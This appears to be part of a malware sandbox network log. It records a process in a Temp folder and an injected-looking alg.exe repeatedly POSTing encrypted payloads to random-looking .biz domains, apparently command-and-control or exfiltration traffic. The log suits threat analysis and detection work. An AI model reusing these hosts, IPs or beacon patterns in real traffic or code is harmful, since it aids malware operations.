                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:56:58.832992077 CET | 778 | OUT | Data Raw: 90 e6 73 ca be 2a 7f 5f fe 02 00 00 fc ee cb 25 ef 89 fd 12 14 a7 76 67 19 7a 30 87 7e 17 c8 f5 8b 46 9d bc e7 fd 4b 7c fb ce cc 34 e0 3c 55 80 e5 92 f2 f5 ca f2 aa 05 ea ea 3f e0 2d c3 27 5f dc 57 03 7c 9d 2d 20 06 48 71 fa c2 53 84 14 97 e9 9b
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: s*_%vgz0~FK|4<U?-'_W|- HqS4Rn)2P3E`L_hD"ag=YDR54D?m=_.h}PK>f5hPt8-$p|z@B;=n:ER6~SIS3


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.7 | 49936 | 82.112.184.197 | 80 | 2724 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:56:59.913058996 CET | 355 | OUT | POST /hwverablwtpyp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 844


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.7 | 49941 | 172.234.222.138 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:00.252940893 CET | 348 | OUT | POST /uspwu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.7 | 49947 | 18.141.10.107 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:01.297298908 CET | 345 | OUT | POST /j HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: knjghuig.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:57:02.693962097 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:57:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=bea154ea47c5381d6b615a2c6ca18af3|155.94.241.187|1731920222|1731920222|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.7 | 49955 | 82.112.184.197 | 80 | 2724 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:02.880629063 CET | 355 | OUT | POST /epvislkuanodp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 844


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.7 | 49962 | 82.112.184.197 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:03.972387075 CET | 355 | OUT | POST /ceginiuaduqvi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.972403049 CET778OUTData Raw: e9 00 f9 ff 0a c3 7d 50 fe 02 00 00 e6 dc a3 1a 08 d8 ed a5 98 21 74 29 ec 4b d6 66 d2 90 a2 7c bb 6c ca ec 4b 80 18 a0 53 98 b6 2a 0b 24 de ef 5c f4 9a 85 3e 0d 35 43 ed 9f 4f 22 ef ea 0d 13 63 29 4b 80 be 1f 59 f2 42 3c 1a b8 df 70 af 49 49 32
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: }P!t)Kf|lKS*$\>5CO"c)KYB<pII2\/jd9vKvD"OR74n/w@;ehZzxr=K?g0Oc|s^E=h6q|}-])$n<u`Ysox]Oq7(


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.7 | 49976 | 82.112.184.197 | 80 | 2724 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:06.371336937 CET | 349 | OUT | POST /csle HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 844
Nov 18, 2024 09:57:06.371382952 CET | 844 | OUT | Data Raw: d3 9d 1e 6f b0 41 be 28 40 03 00 00 5c a9 ad a4 28 d3 ef c0 d2 02 61 4a f2 f6 26 94 ba 0c f3 50 81 68 79 42 d8 78 05 aa 10 ed 4a 58 56 b1 31 b5 17 cb cb bc d2 92 86 99 90 8a 01 e5 a6 f9 a3 a5 15 9d 41 af 9c ed fd c5 49 2a 34 cd f5 e4 e1 83 95 84
Data Ascii: oA(@\(aJ&PhyBxJXV1AI*4dL>p,-149i[o9[VWSuYVLGdpfg{rok$V<F@(^=4zsv)w_8\&w"6G


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.7 | 49994 | 82.112.184.197 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:12.932389021 CET | 354 | OUT | POST /yqjfubvmytgo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:57:12.932430983 CET | 778 | OUT | Data Raw: 97 53 93 69 5b 99 51 c2 fe 02 00 00 eb 80 64 73 cf 95 f6 70 bb 8a 2f 9b e2 53 e0 0d 87 9e ac 8a cc e6 ba af 7e 65 9c 6c e4 09 95 cf aa 5b 4e 7e 7f 78 4b 8f 47 d9 95 9f cc 1f 69 26 b7 5e e4 72 d3 50 8e 47 b6 c4 a5 d6 21 90 2b 15 a6 19 6f 06 a9 97
Data Ascii: Si[Qdsp/S~el[N~xKGi&^rPG!+os-SBx:GIn8:$^`9<EEUbD0HJPa*:!#;.iJGI-aWN!5Db0iH('Sn.hScdGM


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.7 | 49995 | 54.244.188.177 | 80 | 1260 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:20.374394894 CET | 353 | OUT | POST /gyfeenvy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 842
Nov 18, 2024 09:57:20.374438047 CET | 842 | OUT | Data Raw: 70 ca 61 dd 13 20 dd 29 3e 03 00 00 54 b5 51 7f 9c cb 18 94 cf 25 72 73 f1 77 9a ba a3 7d b6 74 cf 6c 57 28 3d cb 2d a4 69 55 47 dc 7e 17 34 e4 a2 b0 93 40 c1 f8 40 b9 ff c7 d9 df c2 f4 c9 7c 41 f2 ca 01 e1 47 c0 68 47 f6 c2 60 a6 3e fb 5d d1 e5
Data Ascii: pa )>TQ%rsw}tlW(=-iUG~4@@|AGhG`>]'moBd5owES=4"oeUn[]kf.AVb+cmMe"ke5H~1^(k3]dxAM`,)8-3h#LTJ\OfF
Nov 18, 2024 09:57:21.194853067 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:57:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=89039665acf1ca3a81fc4344934bd7f1|155.94.241.187|1731920241|1731920241|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.7 | 49997 | 18.141.10.107 | 80 | 1260 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:21.555777073 CET | 350 | OUT | POST /asrbrcv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ssbzmoy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 842
Nov 18, 2024 09:57:21.555798054 CET | 842 | OUT | Data Raw: fa 7c 84 2d 9f f6 21 7e 3e 03 00 00 58 88 c5 a1 be a2 ff 79 67 e8 17 9c 59 a7 6f c6 04 fd b9 05 04 8a 6a a4 2e af 7b b5 bd f5 24 bc 3a 15 a0 53 da 27 86 54 aa e0 1d ac 11 8c ac a4 93 44 ae ad 42 e1 b1 d0 3d 4f 14 a8 65 86 1b 2c 2f bc 16 9c 21 69
Data Ascii: |-!~>XygYoj.{$:S'TDB=Oe,/!i6|LE0rY&6S+$2%0Q(i&Zt:qwhAvm/8yymo&%fH'3+ED[[2'@_F{`&uy[9FGWi1;-
Nov 18, 2024 09:57:23.012875080 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:57:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=4869155e56cd3c80bfc06f4fe4387338|155.94.241.187|1731920242|1731920242|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.7 | 49998 | 82.112.184.197 | 80 | 5368 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:21.654699087 CET | 346 | OUT | POST /l HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:57:21.654699087 CET | 778 | OUT | Data Raw: 03 9d a2 c9 a3 57 df 08 fe 02 00 00 d7 8f 78 a2 85 88 43 5c 16 c5 f1 3f a3 ba c3 50 a2 a0 7d ea 42 d7 22 42 f9 4f e0 8b cb 1f d9 1f 3f 5b ab cb 80 fb 13 c9 d0 45 0f 8f d4 38 14 50 53 30 4e f0 4c 40 ac b3 e9 fc 5e 5d 42 b2 5b 98 b5 2b ae 7d f7 7c
Data Ascii: WxC\?P}B"BO?[E8PS0NL@^]B[+}|=I:,5DG:-0eF7>3f+)\RK6QO&9lXe[?$Al)u@gg$f5yAbSuO=*QjZ(# "O~[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.7 | 49999 | 54.244.188.177 | 80 | 1260 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:23.341366053 CET | 352 | OUT | POST /doycjbriulf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cvgrf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 842
Nov 18, 2024 09:57:23.341388941 CET | 842 | OUT | Data Raw: 18 25 5e 88 bf 6b 1f c7 3e 03 00 00 a2 82 93 6e b8 69 d2 ed 13 ad d9 3f 4c 8e cd 4e ca 95 4c 11 84 88 68 87 6e 3c 40 33 a7 47 64 ce 68 71 06 7f 28 34 38 f9 79 a6 f5 fd 81 0b fe bf 52 92 99 03 0e 41 83 9e aa 55 e1 f9 bf 03 6e 55 9b 66 36 72 37 8e
Data Ascii: %^k>ni?LNLhn<@3Gdhq(48yRAUnUf6r7zj>-3O;4w:%mR:U9<+m#q,Q<e5Y"F?OS@nr+=7_aw|CB:a2KtpKXCX`#nl[&
Nov 18, 2024 09:57:24.198163986 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:57:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=201d8d0aca08c1ef4c33feeb70821dfd|155.94.241.187|1731920244|1731920244|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
24 | 192.168.2.7 | 50001 | 54.244.188.177 | 80

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:25.199368000 CET | 353 | OUT | POST /cbqytxty HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 842
Nov 18, 2024 09:57:25.199383974 CET | 842 | OUT | Data Raw: 37 e8 1b 1d f9 ae e4 b4 3e 03 00 00 63 f0 8b 2e 52 c7 54 13 cd 2b d5 55 3a df 5f f0 d0 f9 85 55 62 18 d2 5d a2 22 c7 97 fc 49 d2 c1 01 aa 40 96 3c 86 02 f8 12 26 ca 62 63 2e 2b aa 9d 55 f1 f9 a3 b3 f2 0b ca 72 82 70 b1 e1 3c b0 cf 43 5f aa 9d 68
Data Ascii: 7>c.RT+U:_Ub]"I@<&bc.+Urp<C_hqu,(|8b=zX=GQG%rFV'4(EF4"\O(_\KUdicp*Iv1sB[=^,0N$h)|Sk:5E~IBa.(t
Nov 18, 2024 09:57:26.025418997 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:57:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6415f360d414e43a3d0fed9549f8b1df|155.94.241.187|1731920245|1731920245|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID   Source IP     Source Port   Destination IP   Destination Port
25           192.168.2.7   50003         18.141.10.107    80

Timestamp: Nov 18, 2024 09:57:26.051033974 CET   Bytes transferred: 351   Direction: OUT   Data:
POST /xrepjfbt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ssbzmoy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 842

Timestamp: Nov 18, 2024 09:57:26.051048040 CET   Bytes transferred: 842   Direction: OUT   Data:
Data Raw: 2c d9 c6 cf 35 b2 a0 52 3e 03 00 00 a2 8a a4 27 1b 53 d1 e7 28 1f 3f 40 09 82 bc 52 48 f3 0f e6 6b e1 b3 1a aa 09 b0 f1 6b a3 4d d2 10 b6 6b b3 4f 12 88 76 a2 1f 14 65 a0 35 af af fb 8c 57 e1 49 5d fd 32 ad 18 c0 c9 48 d4 ac 4a 5b 6c 69 39 70 8c
Data Ascii: ,5R>'S(?@RHkkMkOve5WI]2HJ[li9p[@k,2c_E'~=lAeU*:scx#XHe/a3E<pQF4q,Ij:TI@1Z7M!bP*kbpn~dBG7>:N]

Timestamp: Nov 18, 2024 09:57:27.518802881 CET   Bytes transferred: 415   Direction: IN   Data:
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:57:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9cdadf0ed4d81737665493049cd8f8b0|155.94.241.187|1731920247|1731920247|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID   Source IP     Source Port   Destination IP   Destination Port
26           192.168.2.7   50004         54.244.188.177   80

Timestamp: Nov 18, 2024 09:57:27.549246073 CET   Bytes transferred: 352   Direction: OUT   Data:
POST /bbhgohbwpwg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cvgrf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 842

Timestamp: Nov 18, 2024 09:57:27.549246073 CET   Bytes transferred: 842   Direction: OUT   Data:
Data Raw: 4e cb a7 ca 2a e1 a4 52 3e 03 00 00 28 3b 7f 23 0b cb 9e 0a 62 af 3d cd 81 3b 71 0c f7 ac 30 ec bd 45 ca ec a6 85 21 c9 6e b8 98 f0 66 76 5f 4f 1a 40 3f 26 fa b2 79 81 7d f3 88 b3 54 cd 8f e6 b9 9c b7 68 3b 75 e2 14 2c fc 30 35 c0 db 29 b4 87 f2
Data Ascii: N*R>(;#b=;q0E!nfv_O@?&y}Th;u,05)m8jw''i+A\5E8#lF:{XJ]~]O4}(qP8{#@s[ad`K-i+V87-*B*O@!Zblv7h#k1,6 <yX]lVG`Q>jt

Timestamp: Nov 18, 2024 09:57:28.379595995 CET   Bytes transferred: 413   Direction: IN   Data:
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:57:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6aad88018ee0663eb88994e96f05d8b2|155.94.241.187|1731920248|1731920248|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID   Source IP     Source Port   Destination IP   Destination Port
27           192.168.2.7   50005         44.221.84.105    80

Timestamp: Nov 18, 2024 09:57:29.178601980 CET   Bytes transferred: 354   Direction: OUT   Data:
POST /coprggngfj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: npukfztj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 842

Timestamp: Nov 18, 2024 09:57:29.178601980 CET   Bytes transferred: 842   Direction: OUT   Data:
Data Raw: 09 fb 46 6f 8a 69 69 fc 3e 03 00 00 dc 50 ae e4 29 4b 48 3f 5c a6 28 2c c0 8a 13 6d 3b 9f ab 13 f0 3c ed 69 e9 10 ee 62 ee cf f4 cb f3 b7 30 b5 e1 68 b7 28 4c 62 9d ba df a5 02 20 44 08 09 22 b5 3c fd 5e 78 d3 9e 77 76 35 9f 87 dd bc 3f 92 95 74
Data Ascii: Foii>P)KH?\(,m;<ib0h(Lb D"<^xwv5?tYj&X'_:WuhU}"LnK5jt|z;OAWX7"z#zM@d&:h4h/N%aIWkA6L:2.Qu`G>6[W_

Timestamp: Nov 18, 2024 09:57:29.841303110 CET   Bytes transferred: 416   Direction: IN   Data:
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:57:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f5ff51822b4716a485c599edd8527834|155.94.241.187|1731920249|1731920249|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
28 | 192.168.2.7 | 50006 | 172.234.222.138 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:29.865233898 CET | 359 | OUT | POST /noknucojhesrodhp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:57:29.865259886 CET | 842 | OUT | Data Raw: cf 53 3c 97 f5 7f 1f ef 3e 03 00 00 4d 84 16 89 c2 27 8f a7 29 8d ea b6 d7 1b 76 6c 7d ed 80 f7 00 92 d0 bc a6 45 e6 25 16 a0 05 50 65 34 65 04 eb 1f 27 06 70 08 25 df f3 56 48 75 70 48 fb 9d f4 08 0e d4 87 60 98 16 99 a6 d1 61 34 54 31 f1 39 4b
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: S<>M')vl}E%Pe4e'p%VHupH`a4T19K{]4"Fsfxppibf" Vhx,H=3*)f=T{U:.bSiSY6t7_Q`};_/Au!


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.7 | 50008 | 82.112.184.197 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:30.293071032 CET | 351 | OUT | POST /pjqqch HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:57:30.293097019 CET | 778 | OUT | Data Raw: 85 bb c8 7e f6 34 39 dc fe 02 00 00 70 74 01 73 38 df 8e 78 b5 a0 42 ba 76 34 4f 6f 31 3a bd e0 76 f6 57 7c e9 a8 1c ed a4 51 11 50 5e bc 5f 49 06 0e be f7 90 9d b5 2b f2 15 e2 44 81 8d ae a6 25 9e 36 59 6b 67 4c c3 57 23 98 10 43 77 f7 c9 69 ed
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: ~49pts8xBv4Oo1:vW|QP^_I+D%6YkgLW#CwiuQWyW 08T:k!qqU{[h3%ssL?;tiVf|G"`2wS'QNh0x$0F,V!7Jw^gLB#r+=G)FAHpX*cj


Session ID | Source IP | Source Port | Destination IP | Destination Port
30 | 192.168.2.7 | 50009 | 172.234.222.138 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:30.546947002 CET | 347 | OUT | POST /saqm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:57:30.546947002 CET | 842 | OUT | Data Raw: 93 ae 6a bf 15 3f ad 51 3e 03 00 00 a8 e6 69 2e bc e2 37 f4 65 34 89 50 b6 c7 eb 4f 85 c7 2f 59 50 a8 be 0d 61 96 81 b2 06 da 3d 7e 0a 6e 0b 0c 29 71 14 1f 82 3e 68 70 63 18 1e bd 9d d8 35 ea 86 2b 2f 3f d9 e9 50 98 64 db f4 ba 85 8d df 1b 17 6b
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: j?Q>i.7e4PO/YPa=~n)q>hpc5+/?Pdk5|+@GE@ofz//Zl:&WY_!nvgHZXMPJ\3_mNC]6zah)XLU})ySN86]1ogT[!qE",:1


Session ID | Source IP | Source Port | Destination IP | Destination Port
